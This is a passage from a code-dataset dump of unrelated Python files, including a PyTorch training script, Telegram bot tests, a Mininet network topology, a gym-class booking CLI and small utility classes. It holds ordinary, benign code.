        {'adhaara': 'ADHAARA_ADHAARI', 'Anga': 'ANGA_ANGI', 'Anonya': 'ANONYA_ASHRAYA', 'Ashraya': 'ASHRAYA_ASHREYI', 'Avayavi': 'AVAYAVI',
         'darshana': 'DARSHANA', 'Dharma': 'DHARMA_DHARMI', 'Janya': 'JANYA_JANAKA', 'Kaarya': 'KAARYA_KAARANA', 'Nirupaka': 'NIRUPYA_NIRUPAKA',
         'part': 'ANGA', 'Prakaara': 'PRAKAARA_PRAKAARI', 'parentchil': 'COMMON_PARENT', 'Uddheshya': 'UDDHESHYA_VIDHEYA', 'upa': 'UPAVEDA',
         'Upabrahmya': 'UPABRAHMYA_UPABRAHMANA','upani': 'UPANISHAD', 'Vishaya': 'VISHAYA_VISHAYI'}},
        'work':{'other':'components', 'valid_relations':
        {'adhaara': 'ADHAARA_ADHAARI', 'Anga': 'ANGA_ANGI', 'Anonya': 'ANONYA_ASHRAYA', 'Ashraya': 'ASHRAYA_ASHREYI', 'Avayavi': 'AVAYAVI',
         'darshana': 'DARSHANA', 'Dharma': 'DHARMA_DHARMI', 'Janya': 'JANYA_JANAKA', 'Kaarya': 'KAARYA_KAARANA', 'Nirupaka': 'NIRUPYA_NIRUPAKA',
         'part': 'ANGA', 'Prakaara': 'PRAKAARA_PRAKAARI', 'parentchil': 'COMMON_PARENT', 'Uddheshya': 'UDDHESHYA_VIDHEYA', 'upa': 'UPAVEDA',
         'Upabrahmya': 'UPABRAHMYA_UPABRAHMANA', 'upani': 'UPANISHAD', 'Vishaya': 'VISHAYA_VISHAYI', 'chapter': 'CHAPTER',
         'commentary': 'COMMENTARY', 'subcommentary': 'SUB_COMMENTARY', 'comcommentary': 'COMMENTARY_ON_COMMENTARY', 'derived': 'DERIVED',
         'partwhole': 'PART_WHOLE_RELATION', 'section': 'SECTION', 'subsection': 'SUB_SECTION', 'volume': 'VOLUME'}},
        'person':{'other':None, 'valid_relations':{'gurushishya':'GURISHISHYA', 'classmate':'CONTEMPORARY'}}}
    valid_relations = dependant_structures[entity]['valid_relations']
    for child, rel in edges.items():
        try:
            child_properties = [entry for entry in dictList if entry['id'] == child][0]
            if parent not in parent_pred_pair:
                # Bug fix: the original concatenated a str with a dict here
                # (`parent + ' not found in ' + parent_pred_pair`), raising
                # TypeError instead of the intended IndexError message.
                raise IndexError(parent + ' not found in ' + str(parent_pred_pair))
            pred = parent_pred_pair[parent]
            # NOTE(review): person names concatenate first+middle+last with no
            # separators; kept as-is for compatibility — confirm intended.
            jsonFields = {'subject':{'title': getIfExists(child_properties,'name'), 'description': getIfExists(child_properties,'description')},
                          'work':{'title': getIfExists(child_properties,'name'), 'tags':[], 'components':[{'type': 'TEXT', 'langcode': 'Sanskrit',
                                  'scriptcode': 'Devanagari','body': getIfExists(child_properties,'description'), 'hyperlink': ''}]},
                          'person':{'name': getIfExists(child_properties, 'first') + getIfExists(child_properties, 'middle') + getIfExists(child_properties, 'last'),
                                    'biography': getIfExists(child_properties, 'biography')}}[entity]
            pred = addChild(pred, rel['relation'], entity, jsonFields, valid_relations)
            parent_pred_pair[child] = pred[entity]['_id']
            # Recurse into the child's own children, if any.
            if len(g[child]) > 0:
                tree_Navigate(g, g[child], dictList, parent_pred_pair, child, entity)
        except ConnectionError as ce:
            print(ce)
        except Exception as e:
            # Deliberate best-effort: log and continue with the next child.
            print(e)
def getIfExists(dict, key):
    """Return dict[key], or '' when the key is absent or maps to None."""
    value = dict.get(key)
    return '' if value is None else value
def main():
    """Populate the remote apiIyengar service from the local knowledge tree DB.

    Loads subjects, works and persons (plus their relation tables) from the
    peewee database, rebuilds each as a networkx graph, then pushes each tree
    to the API starting from its root node ('aum' / 'all', remote id '1001').
    """
    logging.basicConfig(filename='populateApiIyengarJournal.log',format='%(asctime)s %(message)s',level=logging.DEBUG)
    db = ktm.database
    # safe=True: CREATE TABLE IF NOT EXISTS semantics.
    db.create_tables([ktm.Subject, ktm.SubjectSubjectRelation, ktm.SubjectRelatestoSubject, \
                      ktm.Work, ktm.WorkWorkRelation, ktm.WorkRelatestoWork, \
                      ktm.SubjectHasWork, ktm.WorkSubjectRelation], safe=True)
    logging.debug('Opened knowledgeTree Tables - Subject, SubjectSubjectRelation, Subject-Relates-to-Subject, Work, WorkWorkRelation Work_Relatesto_Work, SubjectHasWork % WorkSubjectRelation')
    # subject related entities
    srs = ktm.SubjectRelatestoSubject.select()
    srsDictList = entity_json_dict_list(srs)
    subjects = ktm.Subject.select()
    subjectsDictList = entity_json_dict_list(subjects)
    # work related entities
    wrw = ktm.WorkRelatestoWork.select()
    wrwDictList = entity_json_dict_list(wrw)
    works = ktm.Work.select()
    worksDictList = entity_json_dict_list(works)
    # person related entities
    prp = ktm.PersonRelatestoPerson.select()
    prpDictList = entity_json_dict_list(prp)
    persons = ktm.Person.select()
    personsDictList = entity_json_dict_list(persons)
    # logging.debug('populated Subject, Work, Person and related in-memory tables')
    # Push each tree: root local id maps to remote id '1001' in each namespace.
    graph_subject = refreshGraph(subjectsDictList, srsDictList)
    tree_Navigate(graph_subject, graph_subject['aum'], subjectsDictList, {'aum':'1001'}, 'aum')
    graph_work = refreshGraph(worksDictList, wrwDictList, entity='work')
    tree_Navigate(graph_work, graph_work['all'], worksDictList, {'all':'1001'}, 'all', entity='work')
    graph_person = refreshGraph(personsDictList, prpDictList, entity='person')
    tree_Navigate(graph_person, graph_person['all'], personsDictList, {'all':'1001'}, 'all', entity='person')
if __name__ == '__main__':
    main()
| StarcoderdataPython |
3370257 | <filename>unit_02/04_object-oriented/3-Advanced_Objects/javascriptobject.py
#
# Object-Oriented Python: Advanced Objects
# Python Techdegree
#
# Created by <NAME> on 12/15/18.
# Copyright (c) 2018 ddApps. All rights reserved.
# ------------------------------------------------
# JavaScript Object Class
# use javascript dot "." notation to access a dictionary entry
# ------------------------------------------------
class JavaScriptObject(dict):
    """A dict whose entries can also be read with attribute (dot) notation,
    mimicking JavaScript object access.

    Dictionary keys take precedence; any name that is not a key falls back
    to the normal attribute protocol (methods, instance attributes).
    """

    def __getattribute__(self, item):
        # Use dict's own slots directly so this lookup cannot recurse
        # through the overridden attribute machinery.
        if dict.__contains__(self, item):
            return dict.__getitem__(self, item)
        return super().__getattribute__(item)
jso = JavaScriptObject({"name": "Dulio"})
jso.language = "Python"  # plain attribute assignment; NOT stored as a dict entry
print(jso.name)
print(jso.language)
# NOTE(review): 'fake_attribute' is neither a key nor an attribute, so this
# line raises AttributeError — presumably an intentional demonstration.
print(jso.fake_attribute)
| StarcoderdataPython |
3340751 | from data_prep import *
# get user input value from commandline
parser = argparse.ArgumentParser()
parser.add_argument('data_dir')            # positional: required
parser.add_argument('--save_dir')
parser.add_argument('--arch')              # 'vgg16' or 'densenet121'
parser.add_argument('--learning_rate')
parser.add_argument('--hidden_units')
parser.add_argument('--epochs')
parser.add_argument('--gpu')               # device string passed to .to()
args = parser.parse_args()
data_dir = args.data_dir
save_dir = args.save_dir
arch = args.arch
learning_rate = args.learning_rate
hidden_units = args.hidden_units
epochs = args.epochs
device = args.gpu
# user did not provide value, set default
# --arch is effectively required: any value other than the two supported
# architectures (including omitting it) exits here.
if (arch == "vgg16"):
    input_size = 25088
    output_size = 102
elif (arch == "densenet121"):
    input_size = 1024
    output_size = 102
else:
    print("Please select model architectures vgg16 or densenet121.")
    exit()
if save_dir is None:
    save_dir = "model_checkpoint.pth"
if learning_rate is None:
    learning_rate = 0.001
else:
    learning_rate = float(learning_rate)
if hidden_units is None:
    if (arch == "vgg16"):
        hidden_units = 4096
    elif (arch == "densenet121"):
        hidden_units = 500
else:
    hidden_units = int(hidden_units)
if epochs is None:
    epochs = 10
else:
    epochs = int(epochs)
if device is None:
    device = "cpu"
# NOTE(review): after the defaults above, none of these can still be None,
# so this guard is dead code; kept for safety.
if(data_dir == None) or (save_dir == None) or (arch == None) or (learning_rate == None) or (hidden_units == None) or (epochs == None) or (device == None):
    print("data_dir, arch , learning_rate, hidden_units, and epochs cannot be none")
    exit()
# TODO: Using the image datasets and the trainforms, define the dataloaders
# `image_datasets` comes from `data_prep` (star import at the top of the file).
dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=32, shuffle=True) for x in ['train', 'valid', 'test']}
# TODO: Build and train your network
if (arch == 'vgg16'):
    model = models.vgg16(pretrained=True)
elif (arch == 'densenet121'):
    model = models.densenet121(pretrained=True)
# NOTE(review): bare expression below is a no-op (leftover notebook echo).
model
# TODO: Do validation on the test set
# Freeze parameters so we don't backprop through them
for param in model.parameters():
    param.requires_grad = False
# Build a feed-forward network
# New classifier head: input_size/hidden_units were chosen above per arch.
classifier = nn.Sequential(OrderedDict([('fc1', nn.Linear(input_size, hidden_units)),
                          ('relu', nn.ReLU()),
                          ('dropout1',nn.Dropout(0.2)),
                          ('fc2', nn.Linear(hidden_units, output_size)),
                          ('output', nn.LogSoftmax(dim=1))]))
# Put the classifier on the pretrained network
model.classifier = classifier
# Train a model with a pre-trained network
# NLLLoss pairs with the LogSoftmax output layer above.
criterion = nn.NLLLoss()
optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate)
#model.to('cuda')
model.to(device)
print("Start training model")
# One 'train' pass and one 'valid' pass per epoch.
for e in range(epochs):
    for dataset in ['train', 'valid']:
        if dataset == 'train':
            model.train()
        else:
            model.eval()
        running_loss = 0.0
        running_accuracy = 0
        for inputs, labels in dataloaders[dataset]:
            #inputs, labels = inputs.to('cuda'), labels.to('cuda')
            inputs, labels = inputs.to(device), labels.to(device)
            optimizer.zero_grad()
            # Forward
            # Gradients are only tracked during the training phase.
            with torch.set_grad_enabled(dataset == 'train'):
                outputs = model(inputs)
                _, preds = torch.max(outputs, 1)
                loss = criterion(outputs, labels)
                # Backward
                if dataset == 'train':
                    loss.backward()
                    optimizer.step()
            # Weight the batch loss by batch size for a dataset-level average.
            running_loss += loss.item() * inputs.size(0)
            running_accuracy += torch.sum(preds == labels.data)
        # NOTE(review): this dict is invariant and could be hoisted above the
        # epoch loop; recomputing it here is cheap but redundant.
        dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'valid', 'test']}
        epoch_loss = running_loss / dataset_sizes[dataset]
        epoch_accuracy = running_accuracy.double() / dataset_sizes[dataset]
        # NOTE(review): "Accurancy" typo lives in the output string; left
        # unchanged to preserve the program's output verbatim.
        print("Epoch: {}/{}... ".format(e+1, epochs),
              "{} Loss: {:.4f} Accurancy: {:.4f}".format(dataset, epoch_loss, epoch_accuracy))
# Accuracy evaluation helper (uses the module-level `model` and `device`).
def check_accuracy_on_test(test_loader):
    """Print the model's top-1 accuracy over every batch in `test_loader`."""
    correct_count = 0
    seen = 0
    model.to(device)
    with torch.no_grad():
        for images, labels in test_loader:
            images, labels = images.to(device), labels.to(device)
            logits = model(images)
            predicted = logits.data.max(1)[1]
            seen += labels.size(0)
            correct_count += (predicted == labels).sum().item()
    print('Accuracy of the network on the test images: %d %%' % (100 * correct_count / seen))
# Bug fix: validation was run on dataloaders['train'] although the function's
# name and the "Do validation on the test set" comment say test set.
check_accuracy_on_test(dataloaders['test'])
# TODO: Save the checkpoint
# Keep the class-index mapping with the weights so predictions can be decoded.
model.class_to_idx = image_datasets['train'].class_to_idx
model.cpu()
torch.save({'model': arch,
            'state_dict': model.state_dict(),
            'class_to_idx': model.class_to_idx},
           save_dir)
print("Save model to:" + save_dir)
4811528 | from datetime import datetime
from database.db import db
class Tweet(db.Model):
    """SQLAlchemy model persisting one tweet fetched from the Twitter API.

    Built from a payload shaped like {'data': {...}, 'includes':
    {'users': [...]}} (looks like the API v2 lookup shape with user
    expansion — confirm against the fetching code).
    """
    tweet_id = db.Column(db.Integer, primary_key=True)   # Twitter's tweet id, reused as PK
    tweet_text = db.Column(db.String(140))               # NOTE(review): v2 tweets can exceed 140 chars — confirm limit
    user = db.Column(db.String(140))                     # username of the first expanded user
    timestamp = db.Column(db.DateTime())                 # tweet creation time (parsed from created_at)
    created = db.Column(db.DateTime())                   # local insertion time
    def __init__(self, tweet):
        """Populate the row from a decoded API response dict `tweet`."""
        self.tweet_id = tweet['data']['id']
        self.tweet_text = tweet['data']['text']
        self.user = tweet['includes']['users'][0]['username']
        # created_at format example: 2021-01-01T12:00:00.000Z
        self.timestamp = datetime.strptime(tweet['data']['created_at'], '%Y-%m-%dT%H:%M:%S.%fZ')
        self.created = datetime.now()
    def __repr__(self):
        return '<Tweet {}>'.format(self.tweet_id)
| StarcoderdataPython |
1693450 | import functools
import logging
import random
import unittest
from datetime import datetime
from unittest import TestCase, suite
from unittest.mock import patch, MagicMock
from coverage.files import os
from freezegun import freeze_time
from sqlalchemy import create_engine
from telegram import Chat, CallbackQuery
from telegram import Message
from telegram import Update
from telegram import User
from bookbot import config_holder
import json
# Freeze "now" at 2007-09-29 15:00; tick=True lets time advance from there.
freezer = freeze_time(datetime(year=2007, month=9, day=29, hour=15), tick=True)
freezer.start()
# Must be populated before the bookbot modules below are imported.
config_holder.config = json.load(open('resource/config.json'))["TEST"]
from bookbot import bookingbot
from bookbot import dataentities
from bookbot import datacore
from bookbot import dateutilbot
from bookbot.datacore import CallData
def lncmp(self, testCaseClass):
def isTestMethod(attrname, testCaseClass=testCaseClass,
prefix=self.testMethodPrefix):
return attrname.startswith(prefix) and \
callable(getattr(testCaseClass, attrname))
testFnNames = list(filter(isTestMethod, list(testCaseClass.__dict__)))
return testFnNames
patch('unittest.TestLoader.getTestCaseNames', lncmp).start()
class Accumulator:
    """Per-test-method call recorder.

    `current_method` names the active bucket, `append` stores into it, and
    integer indexing reads from the active bucket.
    """

    def __init__(self):
        self.current_method = None
        self.accum = {}

    def append(self, other):
        self.accum.setdefault(self.current_method, []).append(other)

    def __getitem__(self, item: int):
        return self.accum[self.current_method][item]
class BotTest(TestCase):
    """End-to-end booking-bot tests driving the real dispatcher with patched
    Telegram network calls; every outgoing message lands in the global `acc`.

    NOTE: tests are order-dependent (e.g. test_month_to_day_pick replays the
    keyboard recorded by test_book), which is why the custom lncmp loader
    preserves definition order.
    """
    @classmethod
    def setUpClass(cls):
        # Patch every network-touching Bot method before starting the bot.
        cls.stubs = [
            patch('telegram.ext.updater.Updater.start_polling'),
            patch('telegram.bot.Bot.send_message', new=send_side_effect),
            patch('telegram.bot.Bot.deleteMessage', new=send_side_effect)
        ]
        for x in cls.stubs:
            x.start()
        bookingbot.main()
        cls.dispatcher = bookingbot.dispatcher
        cls.repository = bookingbot.repository
        global acc
        acc = Accumulator()
    def setUp(self):
        # Route recorded calls into a bucket named after the current test.
        acc.current_method = self._testMethodName
        logging.info(f"Now in {acc.current_method}")
    def test_date_seq(self):
        """Month-name table covers January..December."""
        self.assertEqual(dateutilbot.month_map[1], 'Январь')
        self.assertEqual(dateutilbot.month_map[12], 'Декабрь')
    def test_book(self):
        """/book replies with a 3-row month keyboard (Sep/Oct/Nov 2007)."""
        update = update_factory(user_id=153174359, first_name="Nanodesu", usename="Nanodesuizlesu", text="/book")
        self.dispatcher.process_update(update)
        self.assertEqual(acc[0][1]['text'], 'На какой месяц?')
        self.assertEqual(len(acc[0][1]['reply_markup']['inline_keyboard']), 3)
        keyboard = acc[0][1]['reply_markup']['inline_keyboard']
        self.assertEqual(keyboard[0][0].text, "Сентябрь")
        self.assertEqual(keyboard[1][0].text, "Октябрь")
        self.assertEqual(keyboard[2][0].text, "Ноябрь")
    def test_echo(self):
        """Any non-command text gets the usage hint."""
        update = update_factory(user_id=153174359, first_name="Nanodesu", usename="Nanodesuizlesu", text="random")
        self.dispatcher.process_update(update)
        self.assertEqual(acc[0][1]['text'], 'Введите /book для того чтобы назначить время')
    def test_month_to_day_pick(self):
        """Replaying test_book's first keyboard button selects Sep 2007."""
        month_pick_call = acc.accum["test_book"]
        update = update_callback_factory(user_id=153174359, first_name="Nanodesu", usename="Nanodesuizlesu",
                                         text="/book",
                                         query_data=datacore.data_as_json(month_pick_call[0][1]["reply_markup"]['inline_keyboard'][0][0].callback_data))
        self.dispatcher.process_update(update)
        self.assertTrue(153174359 in self.repository.user_data)
        self.assertEqual(self.repository.user_stances[153174359], datacore.consts.MONTH_PICKED)
        self.assertEqual(self.repository.user_data[153174359][datacore.consts.MONTH_PICKED], 9)
        self.assertEqual(self.repository.user_data[153174359][datacore.consts.YEAR_PICKED], 2007)
    def test_day_to_time_pick(self):
        """Only days 29-30 are accepted (frozen clock is 2007-09-29)."""
        update = update_factory(user_id=153174359, first_name="Nanodesu", usename="Nanodesuizlesu", text="10")
        self.dispatcher.process_update(update)
        self.assertEqual(acc[0][1]["text"], "Допустимые значения: 29 - 30")
        update = update_factory(user_id=153174359, first_name="Nanodesu", usename="Nanodesuizlesu", text="31")
        self.dispatcher.process_update(update)
        self.assertEqual(acc[0][1]["text"], "Допустимые значения: 29 - 30")
        update = update_factory(user_id=153174359, first_name="Nanodesu", usename="Nanodesuizlesu", text="28")
        self.dispatcher.process_update(update)
        self.assertEqual(acc[0][1]["text"], "Допустимые значения: 29 - 30")
        update = update_factory(user_id=153174359, first_name="Nanodesu", usename="Nanodesuizlesu", text="wrong")
        self.dispatcher.process_update(update)
        self.assertEqual(acc[0][1]["text"], "Допустимые значения: 29 - 30")
        update = update_factory(user_id=153174359, first_name="Nanodesu", usename="Nanodesuizlesu", text="30")
        self.dispatcher.process_update(update)
    # def test_start_to_end_time_pick(self):
    #     start_time_pick_call = acc.accum["test_day_to_time_pick"]
    #     update = update_callback_factory(user_id=153174359, first_name="Nanodesu", usename="Nanodesuizlesu",
    #                                      text="/book",
    #                                      query_data=datacore.data_as_json(start_time_pick_call[0][1]["reply_markup"]['inline_keyboard'][0][0].callback_data))
def update_factory(user_id, first_name, usename, text=None, time=datetime.now()) -> Update:
    """Build a fake incoming-message Update for dispatcher tests.

    NOTE(review): the `time=datetime.now()` default is evaluated once at
    import (under the frozen clock), so all calls share that timestamp —
    confirm this is intended.
    """
    return Update(update_id=random.randrange(0, 999999),
                  message=Message(from_user=User(is_bot=False, id=user_id, first_name=first_name),
                                  message_id=random.randrange(0, 999999), date=time,
                                  chat=Chat(id=user_id, type="private", username=usename, first_name=first_name),
                                  text=text, bot=MagicMock()))
def send_side_effect(*args, **kwargs):
    """Stand-in for Bot.send_message/deleteMessage: records each call's args
    into the global `acc` accumulator instead of talking to Telegram."""
    logging.info(f"Proxy args: {args}, {kwargs}")
    acc.append([args, kwargs])
def update_callback_factory(user_id, first_name, usename, text=None, time=datetime.now(), query_data: CallData = None):
    """Build a fake Update wrapping a CallbackQuery (inline-button press).

    `query_data` is serialised via its to_json(); the embedded Message mirrors
    update_factory's shape.  NOTE(review): as in update_factory, the
    `time=datetime.now()` default is evaluated once at import time.
    """
    query_data = query_data.to_json()
    return Update(update_id=random.randrange(0, 999999), callback_query=CallbackQuery(id=random.randrange(0, 999999),
                                                                                      message=Message(
                                                                                          from_user=User(is_bot=False,
                                                                                                         id=user_id,
                                                                                                         first_name=first_name),
                                                                                          message_id=random.randrange(0,
                                                                                                                      999999),
                                                                                          date=time,
                                                                                          chat=Chat(id=user_id,
                                                                                                    type="private",
                                                                                                    username=usename,
                                                                                                    first_name=first_name),
                                                                                          text=text, bot=MagicMock()),
                                                                                      from_user=User(is_bot=False,
                                                                                                     id=user_id,
                                                                                                     first_name=first_name),
                                                                                      chat_instance=-random.randrange(0,
                                                                                                                      999999),
                                                                                      data=query_data),
                  )
| StarcoderdataPython |
3234498 |
import numpy as np
def sigmaAB(A, uA, B, uB, op='*'):
    '''
    Propagate uncorrelated uncertainties of two parameters through either
    multiplication or division.

    For f = A * B or f = A / B, the relative uncertainty is
        uAB = sqrt((uA/A)**2 + (uB/B)**2)
    and the absolute uncertainty is |uAB * f|.

    Parameters:
        A, B - array-like operands. Must be same size or broadcastable.
        uA, uB - constants or array-likes of the uncertainty of each
                 measurement; broadcastable to A and B respectively.
        op - 'Operation': '*' for f = A * B, '/' for f = A / B.

    Returns:
        (uAB, uf) - tuple of the relative uncertainty and the absolute
        uncertainty, such that F = f +/- uf.  (Doc fix: the original
        docstring described a single 'uf' return, but the function has
        always returned this tuple.)  Returns None, after printing a
        message, for an unsupported operator.

    See https://en.wikipedia.org/wiki/Propagation_of_uncertainty for more resources
    (c) ajr - 06.05.2020
    Apache 2.0 - See github.com/unh-mms-rogers/mms-curvature
    '''
    # Validate the operator before any arithmetic (the original computed uAB
    # first, doing wasted work on an invalid call).
    if op == '*':
        f = np.multiply(A, B)
    elif op == '/':
        f = np.divide(A, B)
    else:
        print("Invalid operator. Must be '*' or '/'")
        return None
    # Relative errors add in quadrature for both '*' and '/'.
    uAB = np.sqrt(np.power(np.divide(uA, A), 2) + np.power(np.divide(uB, B), 2))
    return uAB, np.abs(np.multiply(uAB, f))
| StarcoderdataPython |
53042 | <gh_stars>0
import coords
import customers
import math
import random
import main
# Test if coords are being created and if their
# lats/lons are in radians after creation
def test_coords():
    """1000 random lat/lon pairs must be stored converted to radians."""
    for i in range(1000):
        lat = random.uniform(-90, 90)
        lon = random.uniform(-180, 180)
        cds = coords.Coords(lat, lon)
        assert cds.latitude == math.radians(lat)
        assert cds.longitude == math.radians(lon)
# Tests if we have a couple of known distances
# Also tests if the distance is the same in the opposite direction
def test_distance():
    """Known great-circle distances: quarter (~10007 km) and half
    (~20015 km) of Earth's circumference along the equator."""
    c1 = coords.Coords(0, 0)
    c2 = coords.Coords(0, 90)
    c3 = coords.Coords(0, -90)
    assert int(c1.distance(c2)) == 10007
    assert int(c2.distance(c1)) == 10007
    assert int(c1.distance(c3)) == 10007
    assert int(c3.distance(c1)) == 10007
    c2 = coords.Coords(0, 180)
    c3 = coords.Coords(0, -180)
    assert int(c1.distance(c2)) == 20015
    assert int(c2.distance(c1)) == 20015
    assert int(c1.distance(c3)) == 20015
    assert int(c3.distance(c1)) == 20015
# Tests if the customer creation works as intended
def test_customer():
    """Customer stores id/name verbatim and coords in radians."""
    auid = int(random.uniform(0, 1000))
    alat = random.uniform(-90, 90)
    along = random.uniform(-180, 180)
    alice = customers.Customer(auid, 'Alice', coords.Coords(alat, along))
    assert alice.user_id == auid
    assert alice.name == 'Alice'
    assert alice.coords.latitude == math.radians(alat)
    assert alice.coords.longitude == math.radians(along)
# Testing the creation of the application
def test_application():
    """The app's office location defaults to the Dublin coordinates, stored in radians."""
    app = main.App()
    assert app.office.latitude == math.radians(53.339428)
    assert app.office.longitude == math.radians(-6.257664)
# Test if the read_customers command is reading the whole file
def test_read_customers():
    """customers.txt fixture contains 32 records."""
    app = main.App()
    app.read_customers('customers.txt')
    assert len(app.customers) == 32
# Test inviting customers at two different distance thresholds
def test_invite_near_customers():
    """16 customers lie within 100 km of the office, 8 within 50 km."""
    app = main.App()
    app.read_customers('customers.txt')
    app.invite_near_customers(100)
    assert len(app.invited) == 16
    app.invite_near_customers(50)
    assert len(app.invited) == 8
# Testing the output production
def test_write_invited():
    """One output line per invited customer (16 within 100 km)."""
    app = main.App()
    app.read_customers('customers.txt')
    app.invite_near_customers(100)
    app.write_invited('output.txt')
    with open('output.txt', 'r+') as f:
        assert len(f.readlines()) == 16
| StarcoderdataPython |
4817163 | """Interact with Pure Fitness/Yoga service.
Usage:
pypuregym location <gym-type> <region-id>
pypuregym schedule <region-id> <location-id> <date>
pypuregym book <region-id> <class-id> <username> <password> [--wait-until <wait>] [--retry <retry>]
Options:
<gym-type> Can be "fitness" or "yoga".
<region-id> Can be "HK", "CN" or "SG".
<location-id> ID of the studio (given with the "location" command).
<date> Date to get the schedule for.
<class-id> Class ID to book.
<username> Your Pure username/email.
<password> Your Pure password.
--wait-until <wait> When booking a class, wait until the specified date time before booking.
--retry <retry> Number of time to retry when booking the class.
""" # noqa
import logging
from docopt import docopt
from pypuregym import __version__
from pypuregym.cli.location import get_location
from pypuregym.cli.schedule import get_schedule
from pypuregym.cli.book import book_class
def main():
    """CLI entry point.

    Parses the module docstring with docopt and dispatches to the
    location / schedule / book sub-commands.  Note the int() conversions
    below raise ValueError for non-numeric location/class ids.
    """
    args = docopt(__doc__, version=__version__)
    logging.basicConfig(
        format='%(asctime)s - %(levelname)s - %(message)s',
        level=logging.INFO,
    )
    if args['location']:
        get_location(
            gym_type=args['<gym-type>'],
            region_id=args['<region-id>'],
        )
    elif args['schedule']:
        get_schedule(
            region_id=args['<region-id>'],
            location_id=int(args['<location-id>']),
            date=args['<date>'],
        )
    elif args['book']:
        book_class(
            region_id=args['<region-id>'],
            class_id=int(args['<class-id>']),
            username=args['<username>'],
            password=args['<password>'],
            wait_until=args['--wait-until'],
            retry=args['--retry'],
        )
if __name__ == '__main__':
    main()
| StarcoderdataPython |
122203 | <filename>stream/feed/__init__.py
from .feeds import AsyncFeed, Feed
| StarcoderdataPython |
131211 | <gh_stars>0
# -*- coding: utf-8 -*-
"""Branch office topology
terminate switch
| |
hosts switch
|
hosts
Hosts consist of PC+Phones, ATMs, Security devices (camers, etc)
"""
from mininet.topo import Topo
from mininet.net import Mininet
from mininet.cli import CLI
from mininet.log import setLogLevel
from mininet.node import RemoteController, OVSSwitch
from functools import partial
class MyTopo( Topo ):
    "Branch-office topology: two switches, two security hosts, num PC/phone host pairs."
    def __init__( self, num ):
        "Create custom topo with `num` host/phone pairs split across two switches."
        # Initialize topology
        Topo.__init__( self )
        # Add switches and the inter-switch trunk (s1 port 2 <-> s2 port 1)
        s1 = self.addSwitch( 's1', dpid='%x' % 31)
        s2 = self.addSwitch( 's2', dpid='%x' % 32)
        self.addLink( s1, s2, 2, 1 )
        # Security devices get their own /27 subnet, attached to s1
        sec1 = self.addHost( 'sec1', ip='172.16.28.2/27')
        sec2 = self.addHost( 'sec2', ip='172.16.28.3/27')
        self.addLink( sec1, s1, 0, 3 )
        self.addLink( sec2, s1, 0, 4 )
        pnum = 5
        # Attach half of the host/phone pairs to s1, the other half to s2.
        # Bug fix: `num / 2` is float division under Python 3, which makes
        # range() raise TypeError; `//` floor-divides identically on both
        # Python 2 and 3.
        for i in range(2, num // 2 + 2):
            print('i = ',i, ' pnum = ', pnum)
            h = self.addHost( 'h%s'%i, ip='172.16.128.%s/26'%i)
            t = self.addHost( 't%s'%i, ip='172.16.128.%s/26'%(64+i))
            self.addLink( h, s1, 0, pnum )
            self.addLink( t, s1, 0, pnum+1 )
            pnum += 2
        pnum = 4
        for i in range(num // 2 + 2, num + 2):
            print('i = ',i, ' pnum = ', pnum)
            h = self.addHost( 'h%s'%i, ip='172.16.128.%s/26'%i)
            t = self.addHost( 't%s'%i, ip='172.16.128.%s/26'%(64+i))
            self.addLink( h, s2, 0, pnum )
            self.addLink( t, s2, 0, pnum+1 )
            pnum += 2
def runMinimalTopo():
    """Start the topology against a remote OpenFlow 1.3 controller, set
    default routes on every host, attach the VM's eth1 to s1, then drop
    into the Mininet CLI until the user exits."""
    CONTROLLER_IP = '192.168.2.4'
    num = 5
    topo = MyTopo(num) # Create an instance of our topology
    net = Mininet(topo = topo,
                  controller=lambda name: RemoteController( name, ip=CONTROLLER_IP),
                  switch=partial(OVSSwitch, protocols='OpenFlow13'),
                  autoSetMacs=True )
    net.start()
    # Default gateways: hosts via .1, phones via .65 (their /26 gateways).
    for i in range(2, num + 2):
        print('i = ',i)
        net.get('h%s'%i).cmd('ip route add default via 172.16.128.1')
        net.get('t%s'%i).cmd('ip route add default via 172.16.128.65')
    net.get('sec1').cmd('ip route add default via 172.16.28.1')
    net.get('sec2').cmd('ip route add default via 172.16.28.1')
    # To connect to the VM's external interface:
    # OVS will take the first unused port.
    net.get('s1').cmd('ovs-vsctl add-port s1 eth1')
    cli = CLI(net)
    # After the user exits the CLI, shutdown the network.
    net.stop()
if __name__ == '__main__':
    # This runs if this file is executed directly
    setLogLevel( 'info' )
    runMinimalTopo()
# Topology-name -> class mapping, read when the file is loaded as a custom topo.
topos = { 'mytopo': MyTopo }
1615498 | <reponame>Minkov/python-oop<gh_stars>1-10
import functools
def log(func):
    """Decorator that prints the wrapped function's name on every call.

    Returns a wrapper (with metadata preserved via functools.wraps) that
    forwards all positional and keyword arguments to `func`.
    """
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        # Bug fix / generalization: the wrapper previously accepted no
        # arguments, so decorating any function with parameters raised
        # TypeError at call time. Zero-argument functions behave as before.
        print(f'{func.__name__} executed')
        return func(*args, **kwargs)
    return wrapper
# Decorator syntax: f1 is replaced by log's wrapper at definition time.
@log
def f1():
    return 5
print(f1())
# Equivalent manual application of the decorator, without @ syntax.
def f2():
    return 5
f2 = log(f2)
print(f2())
| StarcoderdataPython |
153334 | <reponame>kevinastone/generator<filename>generator/util.py
import fnmatch
def _wildcard_filter(names, *ignore_patterns):
for name in names:
if any(fnmatch.fnmatchcase(name, pattern) for pattern in ignore_patterns):
continue
yield name
def copy_attributes(source, destination, ignore_patterns=()):
    """
    Copy the attributes from a source object to a destination object.

    Every name in dir(source) that matches none of the glob patterns in
    *ignore_patterns* is set on *destination*.  Note dir() includes
    inherited and dunder attributes, so callers typically pass patterns
    such as '__*' to skip them.
    """
    # Idiom fix: the default was a mutable list ([]); a tuple avoids the
    # shared-mutable-default pitfall and accepts exactly the same calls.
    for attr in _wildcard_filter(dir(source), *ignore_patterns):
        setattr(destination, attr, getattr(source, attr))
| StarcoderdataPython |
29233 | from .item import Item
from .entry import Entry
from copy import copy
class Record(object):
    """
    A Record, the tuple of an entry and its item
    Records are useful for representing the latest entry for a
    field value.
    Records are serialised as the merged entry and item
    """
    def __init__(self, entry=None, item=None):
        # entry: the Entry half; item: the Item half (both optional at first)
        self.entry = entry
        self.item = item
    @property
    def primitive(self):
        """Record as Python primitive: the item's fields merged with (and
        overridden by, on key collision) the entry's fields."""
        primitive = copy(self.item.primitive)
        primitive.update(self.entry.primitive)
        return primitive
    @primitive.setter
    def primitive(self, primitive):
